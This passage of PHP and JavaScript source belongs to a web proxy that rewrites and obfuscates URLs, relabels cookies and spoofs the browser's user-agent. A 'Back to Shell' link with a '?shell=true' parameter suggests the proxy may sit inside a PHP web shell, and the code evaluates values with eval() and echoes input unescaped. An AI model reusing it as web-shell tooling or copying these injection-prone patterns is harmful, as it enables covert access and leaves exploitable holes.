- <a class="proxy_link" href="<?php echo (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS']=='on'?'https':'http')."://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']?>?shell=true">
- Back to Shell
- </a>
- <a id="proxy_link_mode" class="proxy_link" href="#"
- onclick="toggle_mode();">
- <?php echo($OPTIONS['SIMPLE_MODE']?'Advanced':'Simple');
- ?> Mode
- </a>
- </td>
- </tr>
- </table>
- </form>
- <? if( // main footer include
- !empty($CONFIG['INCLUDE_MAIN_FOOTER']) &&
- file_exists($CONFIG['INCLUDE_MAIN_FOOTER'])
- ) include($CONFIG['INCLUDE_MAIN_FOOTER']); ?>
- <noscript>
- <br />
- <b>**</b> W.E.B.P.R.O.X.Y has detected that your browser does not have Javascript
- enabled. <b>**</b>
- <br />
- <b>**</b> W.E.B.P.R.O.X.Y requires Javascript in order to function to its full
- potential. It is highly recommended that you have Javascript enabled for
- privacy and security reasons. <b>**</b>
- </noscript>
- </body>
- </html>
- <?php exit(); }
- # }}}
- # FRAMED PAGE WITH URL FORM {{{
- if(
- PAGETYPE_ID===PAGETYPE_FRAME_TOP &&
- $OPTIONS['URL_FORM'] &&
- ORIG_URL!=null
- ){ ?>
- <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
- "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
- <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
- <head>
- <title><?php echo($LABEL['TITLE']); ?></title>
- <style>
- html, body {
- font-family: bitstream vera sans, arial;
- margin: 0px;
- padding: 0px;
- height: 100%;
- overflow: hidden;
- }
- form#url_form {
- margin: 0px;
- padding: 0px;
- height: 100%;
- }
- table#url_table {
- margin: 0px;
- padding: 0px;
- height: 100%;
- width: 100%;
- }
- td#url_table_td_input {
- width: 100%;
- padding: 3px;
- padding-left: 10px;
- }
- td#url_table_td_iframe {
- margin: 0px;
- padding: 0px;
- height: 100%;
- }
- a#url_link {
- color: #000000;
- font-weight: bold;
- padding: 8px;
- text-decoration: none;
- }
- a#url_link:hover {
- color: #000000;
- font-weight: bold;
- padding: 8px;
- text-decoration: underline;
- }
- input {
- border: 1px solid #000000;
- color: #000000;
- }
- input#url_input {
- width: 100%;
- }
- input#url_submit {
- background-color: #FFFFFF;
- margin-right: 3px;
- }
- iframe#url_iframe {
- border: 0px;
- border-top: 1px solid #000000;
- width: 100%;
- height: 100%;
- }
- </style>
- <script type="text/javascript">
- <!--
- <?php echo(COOK_PREF); ?>=true;
- function submit_code(){
- <?php if($OPTIONS['ENCRYPT_URLS']){ ?>
- document.forms[0].<?php echo(COOK_PREF); ?>.value=
- <?php echo(COOK_PREF); ?>_pe.proxenc(
- document.forms[0].<?php echo(COOK_PREF); ?>.value
- );
- <?php } ?>
- location.href="?=&="+document.forms[0].<?php echo(COOK_PREF); ?>.value;
- return false;
- }
- function update_url(url){
- document.getElementById('url_input').value=url;
- document.getElementById('url_link').href="?=-&="+escape(url);
- }
- //-->
- </script>
- </head>
- <body>
- <? if( // URL form header include
- !empty($CONFIG['INCLUDE_URL_HEADER']) &&
- file_exists($CONFIG['INCLUDE_URL_HEADER'])
- ) include($CONFIG['INCLUDE_URL_HEADER']); ?>
- <form id="url_form" method="get" onsubmit="return submit_code();"
- action="<?php echo(THIS_SCRIPT); ?>">
- <table cellspacing="0" cellpadding="0" id="url_table">
- <tr>
- <td>
- <a href="<?php echo(THIS_SCRIPT.'?=-&='.OENC_URL); ?>"
- id="url_link"><<
- </a>
- </td>
- <td> </td>
- <td id="url_table_td_input">
- <input type="text" id="url_input" name="<?php echo(COOK_PREF); ?>"
- value="<?php echo(ORIG_URL); ?>" />
- </td>
- <td> </td>
- <td>
- <input type="submit" id="url_submit"
- value="<?php echo($LABEL['SUBMIT_SIMPLE']); ?>" style="cursor:pointer;" />
- </td>
- </tr>
- <tr>
- <td colspan="5" id="url_table_td_iframe">
- <iframe frameborder="0" id="url_iframe"
- name="<?php echo(COOK_PREF); ?>_top"
- src="<?php echo(THIS_SCRIPT.'?=_&='.OENC_URL); ?>"></iframe>
- </td>
- </tr>
- </table>
- </form>
- </body>
- </html>
- <?php exit(); }
- # }}}
- # PRE-JAVASCRIPT CONSTANTS & FUNCTIONS {{{
- # these constants and functions must be defined before JS is output, but would
- # be more readably located later.
- #define('AURL_LOCK_REGEXP','(?:(?:javascript|mailto|about):|~|%7e)');
- define('FRAME_LOCK_REGEXP','/^(?:(?:javascript|mailto|about):|#)/i');
- define('AURL_LOCK_REGEXP',
- '/^(?:(?:javascript|mailto|about):|#|'.
- str_replace(array('/','.'),array('\/','\.'),addslashes(THIS_SCRIPT)).')/i');
- define('URLREG','/^'.
- '(?:([a-z]*)?(?:\:?\/\/))'. # proto
- '(?:([^\@\/]*)\@)?'. # userpass
- '([^\/:\?\#\&]*)'. # servername
- '(?:\:([0-9]+))?'. # portval
- '(\/[^\&\?\#]*?)?'. # path
- '([^\/\?\#\&]*(?:\&[^\?\#]*)?)'. # file
- '(?:\?([\s\S]*?))?'. # query
- '(?:\#([\s\S]*))?'. # label
- '$/ix');
- # }}}
- # STATIC CACHING FUNCTION {{{
- function static_cache(){
- # headers
- header('Cache-Control: must-revalidate');
- header('Pragma: cache');
- # last modified
- $lastmod=filemtime(THIS_FILE);
- $ifmod=(
- isset($_SERVER['HTTP_IF_MODIFIED_SINCE'])?
- $_SERVER['HTTP_IF_MODIFIED_SINCE']:null
- );
- if(!empty($ifmod)){
- if(strpos($ifmod,';'))
- $ifmod=substr($ifmod,0,strpos($ifmod,';'));
- $ifmod=strtotime($ifmod);
- if($ifmod==$lastmod){
- header('HTTP/1.1: 304 Not Modified');
- exit();
- }
- }
- header('Last-Modified: '.gmdate('D, d M Y H:i:s',$lastmod).' GMT');
- }
- # }}}
- # CSS STATIC CONTENT {{{
- # CSS MAIN {{{
- if(QUERY_STRING=='css_main'){
- header('Content-Type: text/css');
- static_cache();
- foreach($STYLE as $id=>$style){
- echo "{$id} {{$style}}\n\n";
- }
- echo ".display_none { display: none !important; }\n";
- echo ".display_tr { display: table-row !important; }\n";
- exit();
- }
- # }}}
- # CSS URL FRAME {{{
- if(QUERY_STRING=='css_url_frame'){
- header('Content-Type: text/css');
- static_cache();
- foreach($STYLE_URL_FORM as $id=>$style){
- echo "{$id} {{$style}}\n\n";
- }
- exit();
- }
- # }}}
- # }}}
- # JAVASCRIPT STATIC CONTENT/FUNCTIONS {{{
- if(
- QUERY_STRING=='js_funcs' ||
- QUERY_STRING=='js_funcs_framed' ||
- QUERY_STRING=='js_funcs_nowrap'
- ){
- if(QUERY_STRING=='js_funcs_nowrap')
- $do_wrap=false;
- else $do_wrap=true;
- static_cache();
- ?>//<script type="text/javascript">
- // JAVASCRIPT FUNCS: FUNCTIONS FOR NON-WRAPPED PAGES {{{
- <?php if(!$do_wrap){ ?>
- function useragent_change(){
- var ua=document.getElementById('proxy_useragent');
- var uac=document.getElementById('proxy_useragent_custom');
- var uacTR=document.getElementById('proxy_useragent_custom_tr');
- if(parseInt(ua.value)==1) uacTR.className="display_tr";
- else uacTR.className="display_none";
- }
- function toggle_mode(){
- var url=document.getElementById('proxy_url');
- var simpBut=document.getElementById('proxy_submit_simple');
- var modeLink=document.getElementById('proxy_link_mode');
- var advTR=document.getElementsByName('advanced_mode');
- for(var i=0; i<advTR.length; i++){
- if(advanced_mode) advTR[i].style.display="none";
- else advTR[i].style.display="table-row";
- }
- if(advanced_mode){
- url.style.width="<?php echo($CONFIG['SIMPLE_MODE_URLWIDTH']) ?>";
- simpBut.style.display="inline";
- modeLink.innerHTML="Advanced Mode";
- }
- else{
- url.style.width="100%";
- simpBut.style.display="none";
- modeLink.innerHTML="Simple Mode";
- }
- advanced_mode=!advanced_mode;
- }
- function main_submit_code(){
- var dgEBI=function(id){ return document.getElementById(id); }
- dgEBI('proxy_url_hidden').disabled=false;
- if(dgEBI('proxy_encrypt_urls').checked)
- dgEBI('proxy_url_hidden').value=
- <?php echo(COOK_PREF); ?>_pe.proxenc(dgEBI('proxy_url').value);
- else dgEBI('proxy_url_hidden').value=dgEBI('proxy_url').value;
- return true;
- }
- <?php } ?>
- // }}}
- // JAVASCRIPT FUNCS: CRYPTOGRAPHIC FUNCTIONS {{{
- <?php echo(COOK_PREF); ?>_pe={
- expon:function(a,b){
- var num;
- if(b==0) return 1;
- num=a; b--;
- while(b>0){ num*=a; b--; }
- return num;
- },
- dectobin:function(){
- var dec=arguments[0],chars=arguments[1]||8,binrep="";
- for(j=chars-1;j>=0;j--){
- if(dec>=this.expon(2,j)){
- binrep+="1"; dec-=this.expon(2,j);
- }
- else binrep+="0";
- }
- return binrep;
- },
- bintodec:function(){
- var bin=arguments[0],chars=arguments[1]||8,dec=0;
- for(var j=0;j<chars;j++)
- if(bin.substring(j,j+1)=="1") dec+=this.expon(2,chars-1-j);
- return dec;
- },
- b64e:function(string){
- var encstr="",binrep="";
- var charbin,charnum;
- for(var i=0;i<string.length;i++){
- charnum=string.charCodeAt(i);
- binrep+=this.dectobin(charnum);
- }
- while(binrep.length%6) binrep+="00";
- for(var i=1;i*6<=binrep.length;i++){
- charbin=binrep.substring((i-1)*6,i*6);
- charnum=this.bintodec(charbin,6);
- if(charnum<=25) charnum+=65;
- else if(charnum<=51) charnum+=71;
- else if(charnum<=61) charnum-=4;
- else if(charnum==62) charnum=43;
- else if(charnum==63) charnum=47;
- encstr+=String.fromCharCode(charnum);
- }
- while(encstr.length%8) encstr+="=";
- return encstr;
- },
- proxenc:function(url){
- var new_url="";
- var charnum;
- if(url.substring(0,1)=="~" || url.substring(0,3).toLowerCase()=="%7e")
- return url;
- url=encodeURIComponent(url);
- var sess_pref="<?php echo(SESS_PREF); ?>";
- for(i=0;i<url.length;i++){
- charnum=url.charCodeAt(i);
- charnum+=sess_pref.charCodeAt(i%sess_pref.length);
- while(charnum>126) charnum-=94;
- new_url+=String.fromCharCode(charnum);
- }
- return "~"+encodeURIComponent(this.b64e(new_url));
- },
- b64d:function(str){
- var binrep="",decstr="";
- var charnum,charbin;
- str=str.replace(/[=]*$/,"");
- for(var i=0;i<str.length;i++){
- charnum=str.charCodeAt(i);
- if(charnum>=97) charnum-=71;
- else if(charnum>=65) charnum-=65;
- else if(charnum>=48) charnum+=4;
- else if(charnum==43) charnum=62;
- else if(charnum==47) charnum=63;
- binrep+=this.dectobin(charnum,6);
- }
- for(var i=0;i+8<binrep.length;i+=8){
- charbin=binrep.substr(i,8);
- decstr+=String.fromCharCode(this.bintodec(charbin));
- }
- return decstr;
- },
- proxdec:function(url){
- var new_url,charnum;
- if(url.substr(0,1)!='~' && url.substr(0,3).toLowerCase()!='%7e') return url;
- while(url.substr(0,1)=='~' || url.substr(0,3).toLowerCase()=='%7e'){
- url=url.substr(1,url.length-1);
- url=this.b64d(url);
- new_url="";
- for(i=0;i<url.length;i++){
- charnum=url.charCodeAt(i);
- charnum-="<?php echo(SESS_PREF); ?>".charCodeAt(
- i%"<?php echo(SESS_PREF); ?>".length);
- while(charnum<32) charnum+=94;
- new_url+=String.fromCharCode(charnum);
- }
- url=new_url;
- }
- return decodeURIComponent(url); // urldecode()
- },
- }
- // }}}
- // JAVASCRIPT FUNCS: COOK_PREF OBJECT {{{
- <?php if($do_wrap){ ?>
- <?php echo(COOK_PREF); ?>={
- parse_attrs:{
- 'action':{0:'form'},
- 'backgroundImage':{0:'[object CSSStyleDeclaration]'},
- 'baseURI':{0:''},
- 'codebase':{0:''},
- 'href':{0:location,1:'a',2:'link',3:'base'},
- 'location':{0:document},
- 'pluginspage':{0:''},
- 'referrer':{0:document},
- 'src':{0:'img',1:'script'},
- },
- URLREG:<?php echo(substr(URLREG,0,strlen(URLREG)-1)); ?>,
- THIS_SCRIPT:"<?php echo(THIS_SCRIPT); ?>",
- COOK_PREF:"<?php echo(COOK_PREF); ?>",
- PAGE_FRAMED:<?php echo(PAGE_FRAMED?'true':'false'); ?>,
- pe:<?php echo(COOK_PREF); ?>_pe,
- gen_curr_urlobj:function(){ this.curr_urlobj=new this.aurl(this.CURR_URL); },
- getCookieArr:function(){ return document.cookie.split("; "); },
- aurl:function(url,topurl){
- this.URLREG=<?php echo(COOK_PREF); ?>.URLREG;
- this.THIS_SCRIPT=<?php echo(COOK_PREF); ?>.THIS_SCRIPT;
- this.ENCRYPT_URLS=<?php echo(COOK_PREF); ?>.ENCRYPT_URLS;
- this.trim=function(str){ return str.replace(/^\s*([\s\S]*?)\s*$/,"$1"); }
- this.get_fieldreq=function(fieldno,value){
- var fieldreqs=new Array();
- fieldreqs[2]="://"+(value!=""?value+"@":"");
- fieldreqs[4]=(value!="" && parseInt(value)!=80?":"+parseInt(value):"");
- fieldreqs[7]=(value!=""?"?"+value:"");
- fieldreqs[8]=(value!=""?"#"+value:"");
- if(fieldreqs[fieldno]!=undefined) return value;
- // return (value!=""?null:value);
- else return fieldreqs[fieldno];
- }
- this.set_proto=function(proto){
- if(proto==undefined) proto="http";
- if(this.locked) return;
- this.proto=proto;
- }
- this.get_proto=function(){ return this.proto; }
- this.get_userpass=function(){ return this.userpass; }
- this.set_userpass=function(userpass){
- if(userpass==undefined) userpass="";
- this.userpass=userpass;
- }
- this.get_servername=function(){ return this.servername; }
- this.set_servername=function(servername){
- if(servername==undefined) servername="";
- this.servername=servername;
- }
- this.get_portval=function(){
- return (
- this.portval==""?
- (this.get_proto()=="https"?"443":"80"):
- this.portval
- );
- }
- this.set_portval=function(port){
- if(port==undefined) port="";
- this.portval=((parseInt(port)!=80)?port:"").toString();
- }
- this.get_path=function(){ // ***
- if(this.path==null)
- return null;
- if(this.path.indexOf("/../")!=-1)
- this.path=this.path.replace(/(?:\/[^\/]+){0,1}\/\.\.\//g,"/");
- if(this.path.indexOf("/./")!=-1)
- while((path=this.path.replace("/./","/")) && path!=this.path)
- this.path=path;
- return this.path;
- }
- this.set_path=function(path){
- if(path==undefined) path="/"; this.path=path;
- }
- this.get_file=function(){ return this.file; }
- this.set_file=function(file){ if(file==undefined) file=""; this.file=file; }
- this.get_query=function(){ return this.query; }
- this.set_query=function(query){
- if(query==undefined) query="";
- this.query=query;
- }
- this.get_label=function(){ return this.label; }
- this.set_label=function(label){
- if(label==undefined) label="";
- this.label=label;
- }
- this.get_url=function(){
- var withlabel=true,withquery=true;
- if(arguments.length>0)
- withlabel=arguments[0];
- if(arguments.length>1)
- withquery=arguments[1];
- if(this.locked) return this.url;
- return this.get_proto()+"://"+
- (this.get_userpass()==""?"":this.get_userpass()+"@")+
- this.get_servername()+
- (
- this.get_portval()==undefined || this.get_portval()?
- "":
- ":"+parseInt(this.get_portval())
- )+
- this.get_path()+this.get_file()+
- (!withquery || this.get_query()==""?"":"?"+this.get_query())+
- (!withlabel || this.get_label()==""?"":"#"+this.get_label());
- }
- this.surrogafy=function(){
- var url=this.get_url();
- if(
- this.locked ||
- this.get_proto()+
- this.get_fieldreq(2,this.get_userpass())+
- this.get_servername()+
- this.get_path()+
- this.get_file()
- ==
- this.THIS_SCRIPT
- ) return url;
- var label=this.get_label();
- this.set_label();
- if(this.ENCRYPT_URLS && !this.locked)
- url=<?php echo(COOK_PREF); ?>.pe.proxenc(url);
- // urlencode()d
- //url=this.THIS_SCRIPT+"?="+(!this.ENCRYPT_URLS?escape(url):url);
- url=this.THIS_SCRIPT+"?="+url;
- this.set_label(label);
- return url;
- }
- if(url.length><?php echo($CONFIG['MAXIMUM_URL_LENGTH'])?>)
- this.url="";
- else{
- // parse like PHP does for &#num; HTML entities? // TODO?
- //this.url=preg_replace("/&#([0-9]+);/e","chr(\\1)");
- this.url=this.trim(url.
- replace("&","&").
- replace("\r","").
- replace("\n","")
- );
- }
- this.topurl=topurl;
- if(this.url.match(<?php echo(AURL_LOCK_REGEXP); ?>)!=null)
- this.locked=true;
- else if(this.get_url(false,false)=="<?php echo(THIS_SCRIPT); ?>")
- this.locked=true;
- else
- this.locked=false;
- if(!this.locked){
- var urlwasvalid=true;
- if(!this.url.match(this.URLREG)){
- urlwasvalid=false;
- if(this.topurl==undefined)
- this.url=
- "http://"+
- (
- this.url.charAt(0)==":" || this.url.charAt(0)=="/"?
- this.url.substring(1):
- this.url
- )+
- (this.url.indexOf("/")!=-1?"":"/");
- else{
- var newurl=
- this.topurl.get_proto()+
- "://"+
- this.get_fieldreq(2,this.topurl.get_userpass())+
- this.topurl.get_servername()+
- (
- this.topurl.get_portval()!=80 && (
- this.topurl.get_proto()=="https"?
- this.topurl.get_portval()!=443:true
- )?
- ":"+this.topurl.get_portval():
- ""
- );
- if(this.url.substring(0,1)!="/") newurl+=this.topurl.get_path();
- this.url=newurl+this.url;
- }
- }
- this.set_proto(
- (
- urlwasvalid || this.topurl==undefined?
- this.url.replace(/^([^:]+).*$/,"\$1"):
- this.topurl.get_proto()
- )
- );
- this.set_userpass(this.url.replace(this.URLREG,"\$2"));
- this.set_servername(this.url.replace(this.URLREG,"\$3"));
- this.set_portval(this.url.replace(this.URLREG,"\$4"));
- this.set_path(this.url.replace(this.URLREG,"\$5"));
- this.set_file(this.url.replace(this.URLREG,"\$6"));
- this.set_query(this.url.replace(this.URLREG,"\$7"));
- this.set_label(this.url.replace(this.URLREG,"\$8"));
- }
- //if(!this.locked && !this.url.match(this.URLREG)) havok(7,this.url); //*
- },
- surrogafy_url:function(url,topurl,addproxy){
- url=url.toString();
- if(!url.substring) return;
- if(addproxy==undefined) addproxy=true;
- var urlquote="";
- if(
- (url.substring(0,1)=="\"" || url.substring(0,1)=="'") &&
- url.substring(0,1)==url.substring(url.length-1,url.length)
- ){
- urlquote=url.substring(0,1);
- url=url.substring(1,url.length-1);
- }
- if(topurl==undefined) topurl=this.curr_urlobj;
- var urlobj=new this.aurl(url,topurl);
- var new_url=(addproxy?urlobj.surrogafy():urlobj.get_url());
- if(urlquote!="") new_url=urlquote+new_url+urlquote;
- return new_url;
- },
- surrogafy_url_toobj:function(url,topurl,addproxy){
- url=url.toString();
- if(!url.substring) return;
- if(addproxy==undefined) addproxy=true;
- if(
- (url.substring(0,1)=="\"" || url.substring(0,1)=="'") &&
- url.substring(0,1)==url.substring(url.length-1,url.length)
- ) url=url.substring(1,url.length-1);
- if(topurl==undefined) topurl=this.curr_urlobj;
- return new this.aurl(url,topurl);
- },
- de_surrogafy_url:function(url){
- if(url==undefined) return "";
- url=url.toString();
- if(
- url.match(<?php echo(FRAME_LOCK_REGEXP); ?>) ||
- !url.match(<?php echo(AURL_LOCK_REGEXP); ?>)
- ) return url;
- // urldecode()
- return this.pe.proxdec(decodeURIComponent(
- url.substring(url.indexOf('?')+1).replace(
- <?php echo(PAGETYPE_REGEXP); ?>,"\$2")));
- },
- add_querystuff:function(url,querystuff){
- var pos=url.indexOf('?');
- return url.substr(0,pos+1)+querystuff+url.substr(pos+1,url.length-pos);
- },
- preg_match_all:function(regexpstr,string){
- var matcharr=new Array();
- var regexp=new RegExp(regexpstr);
- var result;
- while(true){
- result=regexp.exec(string);
- if(result!=null) matcharr.push(result);
- else break;
- }
- return matcharr;
- },
- framify_url:function(url,frame_type){
- if(frame_type===<?php echo(PAGETYPE_NULL); ?>)
- return url;
- var urlquote="";
- if(
- (url.substring(0,1)=="\"" || url.substring(0,1)=="'") &&
- url.substring(0,1)==url.substring(url.length-1,url.length)
- ){
- urlquote=url.substring(0,1);
- url=url.substring(1,url.length-1);
- }
- if(!url.match(<?php echo(FRAME_LOCK_REGEXP); ?>)){
- var query;
- if(frame_type===<?php echo(PAGETYPE_FRAME_TOP); ?>)
- query='&=';
- else if(frame_type===<?php echo(PAGETYPE_FRAMED_CHILD); ?>) query='.&=';
- else if(
- frame_type===<?php echo(PAGETYPE_FRAMED_PAGE); ?> ||
- this.PAGE_FRAMED
- ) query='_&=';
- else query='';
- url=url.replace(
- /^([^\?]*)[\?]?<?php echo(PAGETYPE_MINIREGEXP); ?>([^#]*?[#]?.*?)$/,
- '\$1?='+query+'\$3');
- }
- if(urlquote!="") url=urlquote+url+urlquote;
- return url;
- },
- parse_html:function(regexp,partoparse,html,addproxy,framify){
- var match,begin,end,nurl;
- if(html.match(regexp)){
- var matcharr=this.preg_match_all(regexp,html);
- var newhtml="";
- for(var key in matcharr){
- /*match=matcharr[i];
- nurl=this.surrogafy_url(match[partoparse],undefined,addproxy);
- nhtml=match[0].replace(match[partoparse],nurl);
- html=html.replace(match[0],nhtml);*/
- match=matcharr[key];
- if(match[partoparse]!=undefined){
- begin=html.indexOf(match[partoparse]);
- end=begin+match[partoparse].length;
- nurl=this.surrogafy_url(match[partoparse],undefined,addproxy);
- if(framify) nurl=this.framify_url(nurl,framify);
- newhtml+=html.substring(0,begin)+nurl;
- html=html.substring(end);
- }
- }
- html=newhtml+html;
- }
- return html;
- },
- parse_all:function(){
- if(arguments[0]==null) return;
- var html=arguments[0].toString();
- var key;
- for(var key in regexp_arrays){
- if((arguments.length>1 && key!=arguments[1]) || key=='text/javascript')
- continue;
- arr=regexp_arrays[key];
- for(var regexp_arraykey in arr){
- regexp_array=arr[regexp_arraykey];
- if(regexp_array[0]==undefined) continue;
- if(regexp_array[0]==1)
- html=html.replace(regexp_array[1],regexp_array[2]);
- else if(regexp_array[0]==2){
- addproxy=(regexp_array.length>3?regexp_array[3]:true);
- framify=(regexp_array.length>4?regexp_array[4]:false);
- html=this.parse_html(
- regexp_array[1],regexp_array[2],html,addproxy,framify);
- }
- }
- }
- return html;
- },
- form_button:null,
- form_encrypt:function(form){
- if(form.method=='post') return true;
- //action=form.<php echo(COOK_PREF); ?>.value;
- var action=form.getElementsByName(this.COOK_PREF)[0].value;
- for(var i=1;i<form.elements.length;i++){
- if(
- form.elements[i].disabled || form.elements[i].name=='' ||
- form.elements[i].value=='' || form.elements[i].type=='reset'
- ) continue;
- if(form.elements[i].type=='submit'){
- if(form.elements[i].name!=this.form_button) continue;
- this.form_button=null;
- }
- var pref;
- if(!action.match(/\?/)) pref="?";
- else pref="&";
- action+=pref+form.elements[i].name+"="+form.elements[i].value;
- }
- location.href=this.surrogafy_url(action);
- return false;
- },
- isParseAttr:function(obj,attr){
- var ret=false;
- for(var parse_attr in this.parse_attrs){
- if(attr==parse_attr){
- for(var parse_obj in this.parse_attrs[parse_attr]){
- var test_obj=this.parse_attrs[parse_attr][parse_obj];
- if(
- (typeof(test_obj)=="object" && test_obj==obj) ||
- (typeof(test_obj)=="string" && (
- test_obj=='' || test_obj==obj.toString() || (
- obj.tagName &&
- test_obj.toUpperCase()==obj.tagName
- )
- ))
- ){
- ret=true;
- break;
- }
- }
- }
- }
- return ret;
- },
- setAttr:function(obj,attr,val){
- // not the right type, die
- if(obj===undefined || attr===undefined)
- return undefined;
- if(obj===null || attr===null)
- return null;
- // clean off attribute's regexp slashes
- if(typeof(attr)==typeof(/ /)){
- attr=attr.toString();
- attr=attr.substr(1,attr.length-2);
- }
- // if it's null or undefined, nothing needs to be done
- if(val===undefined || val===null){
- this.doSet(obj,attr,val);
- return val;
- }
- if(attr=="innerHTML"){
- this.doSet(obj,attr,this.parse_all(val));
- return obj[attr];
- }
- if(val=="bottom" || val=="right"){
- return obj[attr];
- }
- if(obj==document && attr=="cookie"){
- var COOK_REG=/^([^=]*)=([^;]*)(?:;[\s\S]*?)?$/i;
- var realhost=
- this.LOCATION_HOSTNAME.replace("/^www/i","").replace(".","_");
- var cookkey=val.replace(COOK_REG,"\$1");
- var cookval=val.replace(COOK_REG,"\$2");
- if(this.ENCRYPT_COOKIES){
- cookkey=proxenc(cookkey);
- cookval=proxenc(cookval);
- }
- var newcookie=
- realhost+"<?php echo(COOKIE_SEPARATOR); ?>"+
- cookkey+"="+cookval+"; ";
- document.cookie=newcookie;
- return newcookie;
- }
- if(obj==location && attr=="hostname") return this.LOCATION_HOSTNAME;
- if(obj==location && attr=="search"){
- if(val.substr(0,1)=="?") val=val.substr(1);
- this.curr_urlobj.set_query(val);
- val=this.curr_urlobj.get_url();
- attr="href";
- }
- var proxval=val;
- if(this.isParseAttr(obj,attr)){
- proxval=this.surrogafy_url(val);
- // tags framified must match REGEXPS with regexp_array[5]
- if(obj.tagName=="A" || obj.tagName=="AREA")
- proxval=this.framify_url(
- proxval,<?php echo(COOK_PREF); ?>.NEW_PAGETYPE_FRAME_TOP);
- else if(obj.tagName=="FRAME" || obj.tagName=="IFRAME")
- proxval=this.framify_url(
- proxval,<?php echo(PAGETYPE_FRAMED_CHILD); ?>);
- }
- if(this.URL_FORM){
- if(
- (obj==location && attr=="href") ||
- (attr=="location" && typeof(val)==typeof("")) // <---------------.
- ){ // \
- urlobj=this.surrogafy_url_toobj(val); // |
- if(!urlobj.locked) proxval=this.add_querystuff(proxval,"=&"); // |
- ret=this.thetop.location.href=proxval; // |
- } // |
- else if(attr=="location"){ // only proxy the value if it is a string __/
- ret=this.doSet(obj,attr,val);
- }
- else ret=this.doSet(obj,attr,proxval);
- }
- else ret=this.doSet(obj,attr,proxval);
- return ret;
- },
- doSet:function(obj,attr,val){
- if(typeof(val)!="function" && typeof(val)!="object"){
- if(isNaN(val) || typeof(val)==typeof(""))
- val="\""+this.doEscape(val)+"\"";
- try{ // in case there is only a getter
- obj[attr]=eval(val);
- } catch(e) {} // ignore it
- } else { // same as above
- try{ // in case there is only a getter
- obj[attr]=val;
- } catch(e) {} // ignore it
- }
- return obj[attr];
- },
- doEscape:function(val){
- if(typeof(val)==typeof("")){
- val=val.replace(/\\/g,"\\\\",val);
- val=val.replace(/\n/g,"\\n",val);
- val=val.replace(/\"/g,"\\\"",val);
- }
- return val;
- },
- getAttr:function(obj,attr){
- if(obj===undefined)
- return undefined;
- if(typeof(attr)==typeof(/ /)){
- attr=attr.toString();
- attr=attr.substr(1,attr.length-2);
- }
- if(obj==window && attr=="top"){
- return window;
- }
- if(obj==document && attr=="cookie"){
- var ocookies=this.getCookieArr();
- var cookies="",ocook;
- var COOK_REG=
- /^([\s\S]*)<?php echo(COOKIE_SEPARATOR); ?>([^=]*)=([\s\S]*)(?:; )?$/ig;
- for(var key in ocookies){
- ocook=ocookies[key];
- if(typeof(ocook)!=typeof("")) continue;
- if(ocook.match(COOK_REG)==null) continue;
- var realhost=
- this.LOCATION_HOSTNAME.replace("/^www/ig","").replace(".","_");
- var cookhost=ocook.replace(COOK_REG,"\$1");
- if(cookhost==realhost){
- if(this.ENCRYPT_COOKIES){
- var cookkey=this.pe.proxdec(ocook.replace(COOK_REG,"\$2"));
- var cookval=this.pe.proxdec(ocook.replace(COOK_REG,"\$3"));
- cookies+=cookkey+"="+cookval+"; ";
- }
- else cookies+=ocook.replace(COOK_REG,"\$2=\$3; ");
- }
- }
- return cookies;
- }
- if(obj==navigator){
- if(this.USERAGENT=="-1" && (attr!="plugins" && attr!="mimeType"))
- return undefined;
- if(this.USERAGENT=="") return obj[attr];
- var msie=this.USERAGENT.match(/msie/ig);
- var UA_REG=
- /^([^\/\(]*)\/?([^ \(]*)[ ]*(\(?([^;\)]*);?([^;\)]*);?([^;\)]*);?([^;\)]*);?([^;\)]*);?[^\)]*\)?)[ ]*([^ \/]*)\/?([^ \/]*).*$/ig;
- switch(attr){
- case "appName":
- var tempappname=(
- msie?
- "Microsoft Internet Explorer":
- this.USERAGENT.replace(UA_REG,"\$1")
- );
- if(tempappname=="Opera" || tempappname=="Mozilla")
- tempappname="Netscape";
- return tempappname;
- case "appCodeName": return this.USERAGENT.replace(UA_REG,"\$1");
- case "appVersion":
- return (
- msie?
- this.USERAGENT.replace(UA_REG,"\$2 \$3"):
- this.USERAGENT.replace(UA_REG,"\$2 (\$4; \$7)")
- );
- case "language":
- return (msie?undefined:this.USERAGENT.replace(UA_REG,"\$7"));
- case "mimeType": return navigator.mimeType;
- case "oscpu":
- return (msie?undefined:this.USERAGENT.replace(UA_REG,"\$6"));
- case "platform":
- var tempplatform=this.USERAGENT.replace(UA_REG,"\$4");
- return (
- tempplatform=="compatible" || tempplatform=="Windows"?
- "Win32":
- this.USERAGENT.replace(UA_REG,"\$6")
- );
- case "plugins":
- return (
- !<?php echo(COOK_PREF); ?>.REMOVE_OBJECTS?
- navigator.plugins:
- undefined
- );
- case "product":
- return (msie?undefined:this.USERAGENT.replace(UA_REG,"\$9"));
- case "productSub":
- return (msie?undefined:this.USERAGENT.replace(UA_REG,"\$10"));
- case "userAgent": return this.USERAGENT;
- default: return undefined;
- }
- }
- var val;
- if(obj==location && attr=="search") val=location.href;
- else val=obj[attr];
- // just a string
- if(this.isParseAttr(obj,attr))
- val=this.de_surrogafy_url(val);
- if(obj==location && attr=="search") val=val.replace(/^[^?]*/g,"");
- if(obj==document && attr=="domain") val=this.aurl.get_servername();
- // we have to get at it first for documentBodyAppendChild to work... might
- // as well spy on their stuff while we are at it
- if(obj==document && attr=="body"){
- this.appendChildInit();
- }
- return val;
- },
- getAttrNode:function(obj,attr){
- var node=obj.getAttributeNode(attr);
- if(node==null)
- return null;
- var val=this.getAttr(obj,attr);
- node.baseURI=this.de_surrogafy_url(node.baseURI);
- if(this.isParseAttr(obj,attr)){
- node.nodeValue=val;
- node.textContent=val;
- node.value=val;
- }
- return node;
- },
- eventify:function(a1,a2){
- document.getElementsByTagName("head")[0].addEventListener("load",function(){
- <?php echo(COOK_PREF); ?>.setParentStuff(a1,a2);
- },false);
- window.addEventListener("load",function(){
- <?php echo(COOK_PREF); ?>.setParentStuff(a1,a2);
- },false);
- this.setParentURL(this.CURR_URL);
- },
- setParentURL:function(url){
- if(
- this.thetop!=null && this.thetop!=window && this.thetop.document!=null
- && this.thetop.document.getElementById('url')!=null
- ){
- this.thetop.document.getElementById('url').value=url;
- this.thetop.document.getElementById('proxy_link').href=
- this.add_querystuff(this.surrogafy_url(url),"=-&");
- }
- },
